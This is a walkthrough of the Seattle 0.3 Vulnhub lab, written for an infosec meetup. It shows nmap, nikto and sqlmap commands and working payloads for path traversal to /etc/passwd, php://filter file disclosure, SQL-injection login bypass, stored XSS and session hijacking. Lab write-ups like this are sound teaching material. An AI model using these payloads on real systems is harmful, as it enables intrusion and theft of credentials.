This is my walk through of the Seattle 0.3 Vulnhub challenge by Holly Graceful. I did this challenge as a basic tutorial on the OWASP Top Ten web vulnerabilities that I presented to my infosec meetup group during our October 5th meeting. I performed this penetration test on level 1 and will follow up later with a post on level 2. Level 2 includes input filtering.
I began the pentest by performing nmap scans. The nmap option -sS is for a SYN scan, -A is shorthand for a few other common options and means “Enable OS detection, version detection, script scanning, and traceroute”. The -p- option is shorthand for scan all 65535 TCP ports.
root@kali:~# nmap -sS -A -p- 10.0.2.4
Starting Nmap 7.01 ( https://nmap.org ) at 2016-10-04 05:32 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00100s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.16 ((Fedora) OpenSSL/1.0.2d-fips PHP/5.6.14)
|_http-server-header: Apache/2.4.16 (Fedora) OpenSSL/1.0.2d-fips PHP/5.6.14
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:28:50:62 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 3.19, Linux 3.2 – 4.0
Network Distance: 1 hop
A search of cvedetails.com for this version of Apache turned up nothing. All listed vulnerabilities for OpenSSL were related to DoS or info.
An nmap UDP scan didn’t detect any open ports.
A nikto scan discovered a few interesting details.
Issue #1: Sensitive file disclosure. The /admin and /downloads directories allow directory indexes. The /info.php and /config.php files are available. The /info.php file prints the output of phpinfo() which exposes the server configuration which may come in handy. The /config.php file doesn’t output anything to the page, however we’ll circle back to that later. 😉
root@kali:~# nikto -h http://10.0.2.4
– Nikto v2.1.6
+ Target IP: 10.0.2.4
+ Target Hostname: 10.0.2.4
+ Target Port: 80
+ Start Time: 2016-10-04 05:38:54 (GMT-4)
+ Server: Apache/2.4.16 (Fedora) OpenSSL/1.0.2d-fips PHP/5.6.14
+ Retrieved x-powered-by header: PHP/5.6.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie level created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Uncommon header ‘content-disposition’ found, with contents: filename=”downloads”
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting…
+ OSVDB-3268: /downloads/: Directory indexing found.
+ OSVDB-3092: /downloads/: This might be interesting…
+ Server leaks inodes via ETags, header found with file /manual/, fields: 0x2304 0x51b0c59e09040
+ OSVDB-3092: /manual/: Web server manual found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie lang created without the httponly flag
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake’s list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 8345 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time: 2016-10-04 05:39:06 (GMT-4) (12 seconds)
+ 1 host(s) tested
The main page
A quick check for a /robots.txt file wasn’t found. The robots.txt file tells search engines which directories it shouldn’t index in the search results. This file is a good place to check for sensitive directories that a webmaster wouldn’t want to be in the search results.
I started up OWASP ZAP and configured Firefox to use the ZAP proxy for further testing.
While mousing over the links at the bottom of the page I find some interesting links. The Catalouge link points to /download.php?item=Brochure.pdf.
Issue #2: LFI (and path traversal) at /download.php?item=../../../../../etc/passwd.
This means we can also grab any other files on the system that the current user has access to. Let’s grab that config.php file I mentioned earlier. Now we have the database credentials and we can also save all of the php source code files to analyze for vulnerabilities.
Issue #3: SQL Injection, time-based blind and error-based – There were numerous SQL injection vulnerabilities in this site so I grouped them together.
Error-based SQL Injection in the cookie SessionId. I added a single quote after the cookie SessionId and found a SQL error in the response.
I visited the Vinyl page at URL /products.php?type=1. I added a single quote and was redirected back to the main index page. I though that was odd so I checked the response in ZAP.
Notice that in the lower pane, the request URL is highlighted. The “%27” at the end of the URL is URL encoding of the single quote. In the upper-right pane the response is selected. In the middle pane I’ve highlighted the SQL error that illustrates that there is a blind SQL injection present. I fed the URL to sqlmap to verify.
root@kali:~# sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4" -u "http://10.0.2.4/products.php?type=1" --level=5 --risk=3 --dbms=MYSQL
Select any product, then insert a single quote after the prod id to exploit an error-based SQL injection.
root@kali:~# sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4" -u "http://10.0.2.4/details.php?prod=5&type=2" -p prod --level=5 --risk=3 --dbms=MYSQL
SQL Injection in the login form – I’m able to login with an email of email@example.com, password
"' or 1=1 -- "
Issue #4: Local File Include (LFI) – The footer of each page includes a link to set the currency: GBP, EUR, or USD. The currency is set in the cookie. I selected USD at /products.php?lang=USD. Next I changed the URL to /products.php?lang=/etc/passwd and then clicked on the Vinyl page.
Another way to exploit this to get the contents of php files is to use the php://filter stream wrapper. I change the URL to /products.php?lang=php://filter/convert.base64-encode/resource=config.php, then click on the Vinyl or Clothing page and get the contents of config.php echoed to the page in base64. I copied and pasted the base64 string into a command prompt and piped it to “base64 -d” to decode.
Issue #5: User name and password enumeration – On the My Account page, the page tells you if the email or password is incorrect.
When entering an invalid email address:
When entering an invalid password:
Issue #6: Insecure Direct Object Reference – The URL /blog.php?author=1 gives us the admin email address (firstname.lastname@example.org) which is half of the info we need to login.
Issue #7: Weak administrator password – I sent a login request from ZAP to the fuzzer and found the password was “password”. Of course I could have also used sqlmap with one of the SQL injection vulnerabilities found earlier to dump the password.
Issue #8: Stored XSS – In the blog posts there wasn’t any filtering of user input. In this example I echoed the document cookie. We could have inserted a malicious link to hook the user with BeEF or other malicious payload.
Issue #9: Hard-coded SessionId. The admin account has the same cookie SessionId value after every login. An attacker can intercept the http request using the ZAP or Burp Suite browser proxies or the Tamper Data Firefox add-on to substitute the cookie SessionID to gain admin access.